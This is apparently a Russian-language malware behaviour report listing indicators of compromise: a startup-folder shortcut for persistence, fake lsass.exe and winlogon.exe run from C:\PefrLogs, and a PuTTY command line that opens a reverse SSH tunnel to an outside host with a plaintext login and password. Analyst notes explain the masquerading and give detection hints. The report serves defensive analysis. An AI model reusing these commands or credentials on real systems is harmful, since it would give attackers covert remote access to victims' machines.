Техническая информация
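- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
  (Примечание: ярлык находится в папке автозагрузки пользователя, поэтому он запускается при каждом входе этого пользователя в систему. Имя «ReaderUpdate» похоже на название обновления легитимной программы.)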
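- 'C:\PefrLogs\lsass.exe' -ssh -R 9485:127.0.0.1:7908 pupp.soxx.us -l pupp -pw nina1341521nina
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p7908 -a
  (Примечание: lsass.exe и winlogon.exe запускаются здесь из C:\PefrLogs, а не из <SYSTEM32>. Значит, это не системные файлы Windows, а программы, использующие их имена. Ключи -ssh, -R, -l и -pw вместе с созданием файла PUTTY.RND характерны для консольного SSH-клиента из состава PuTTY. Параметр -R 9485:127.0.0.1:7908 пробрасывает порт 9485 удалённого узла на локальный адрес 127.0.0.1:7908. Тот же адрес и порт переданы второму процессу в -i127.0.0.1 -p7908; по всей видимости, это локальная служба, принимающая соединения через туннель. Признаки для обнаружения: процессы с именами системных файлов, запущенные вне <SYSTEM32>, и исходящие SSH-соединения с рабочих станций.)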
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen C:\PefrLogs\pics.jpg
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- %HOMEPATH%\Recent\pics.lnk
- C:\PefrLogs\GoogleIndexer.vbe
- <LS_APPDATA>\PUTTY.RND
- %HOMEPATH%\Recent\PefrLogs.lnk
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\pics.jpg
- C:\PefrLogs\winlogon.exe
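- 'pu##.soxx.us':22
  (Примечание: порт 22 — стандартный порт SSH, что согласуется с ключом -ssh в командной строке выше. Часть имени узла в этой строке замаскирована символами «##».)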
- DNS ASK pu##.soxx.us
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'